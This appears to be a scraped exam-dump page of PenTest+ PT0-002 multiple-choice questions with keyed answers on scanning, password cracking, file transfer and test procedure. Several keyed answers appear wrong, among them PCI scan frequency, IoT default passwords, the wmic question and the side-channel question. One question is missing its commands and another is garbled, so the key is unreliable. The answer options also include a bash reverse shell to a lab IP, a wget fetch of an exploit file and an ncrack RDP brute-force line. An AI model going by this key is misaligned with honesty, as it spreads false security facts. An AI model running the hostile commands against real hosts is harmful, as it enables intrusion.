What Precise PT0-002 Simulations Is

NEW QUESTION 1
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

• A. Buffer overflows
• B. Cross-site scripting
• C. Race-condition attacks
• D. Zero-day attacks
• E. Injection flaws
• F. Ransomware attacks

Answer: BE

Explanation:

A01-Injection
A02-Broken Authentication A03-Sensitive Data Exposure A04-XXE
A05-Broken Access Control A06-Security Misconfiguration A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities A10-Insufficient Logging & Monitoring

NEW QUESTION 2
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?

• A. nmap -sn 10.12.1.0/24
• B. nmap -sV -A 10.12.1.0/24
• C. nmap -Pn 10.12.1.0/24
• D. nmap -sT -p- 10.12.1.0/24

Answer: A

NEW QUESTION 3
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

• A. Unsupported operating systems
• B. Susceptibility to DDoS attacks
• C. Inability to network
• D. The existence of default passwords

Answer: A

NEW QUESTION 4
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

• A. Whether sensitive client data is publicly accessible
• B. Whether the connection between the cloud and the client is secure
• C. Whether the client's employees are trained properly to use the platform
• D. Whether the cloud applications were developed using a secure SDLC

Answer: A

NEW QUESTION 5
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

• A. John the Ripper
• B. Hydra
• C. Mimikatz
• D. Cain and Abel

Answer: A

NEW QUESTION 6
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

• A. Follow the established data retention and destruction process
• B. Report any findings to regulatory oversight groups
• C. Publish the findings after the client reviews the report
• D. Encrypt and store any client information for future analysis

Answer: D

NEW QUESTION 7
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

• A. Enforce mandatory employee vacations
• B. Implement multifactor authentication
• C. Install video surveillance equipment in the office
• D. Encrypt passwords for bank account information

Answer: B

NEW QUESTION 8
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

• A. Open-source research
• B. A ping sweep
• C. Traffic sniffing
• D. Port knocking
• E. A vulnerability scan
• F. An Nmap scan

Answer: AC

NEW QUESTION 9
A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

• A. nc 10.10.51.50 9891 < exploit
• B. powershell –exec bypass –f \\10.10.51.50\9891
• C. bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
• D. wget 10.10.51.50:9891/exploit

Answer: D

NEW QUESTION 10
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

• A. ftp 192.168.53.23
• B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
• C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
• D. curl –X TRACE https://192.168.53.23:8443/index.aspx
• E. nmap –-script vuln –sV 192.168.53.23

Answer: A

NEW QUESTION 11
A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

• A. Delete the scheduled batch job.
• B. Close the reverse shell connection.
• C. Downgrade the svsaccount permissions.
• D. Remove the tester-created credentials.

Answer: D

NEW QUESTION 12
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

• A. chmod u+x script.sh
• B. chmod u+e script.sh
• C. chmod o+e script.sh
• D. chmod o+x script.sh

Answer: A

NEW QUESTION 13
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

• A. <#
• B. <$
• C. ##
• D. #$
• E. #!

Answer: E

NEW QUESTION 14
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

• A. Weekly
• B. Monthly
• C. Quarterly
• D. Annually

Answer: A

NEW QUESTION 15
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

• A. Alternate data streams
• B. PowerShell modules
• C. MP4 steganography
• D. PsExec

Answer: D

NEW QUESTION 16
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 17
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

• A. Partially known environment testing
• B. Known environment testing
• C. Unknown environment testing
• D. Physical environment testing

Answer: C

NEW QUESTION 18
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

• A. The penetration tester was testing the wrong assets
• B. The planning process failed to ensure all teams were notified
• C. The client was not ready for the assessment to start
• D. The penetration tester had incorrect contact information

Answer: B

NEW QUESTION 19
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

• A. Data flooding
• B. Session riding
• C. Cybersquatting
• D. Side channel

Answer: B

NEW QUESTION 20
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

• A. Wait for the next login and perform a downgrade attack on the server.
• B. Capture traffic using Wireshark.
• C. Perform a brute-force attack over the server.
• D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 21
......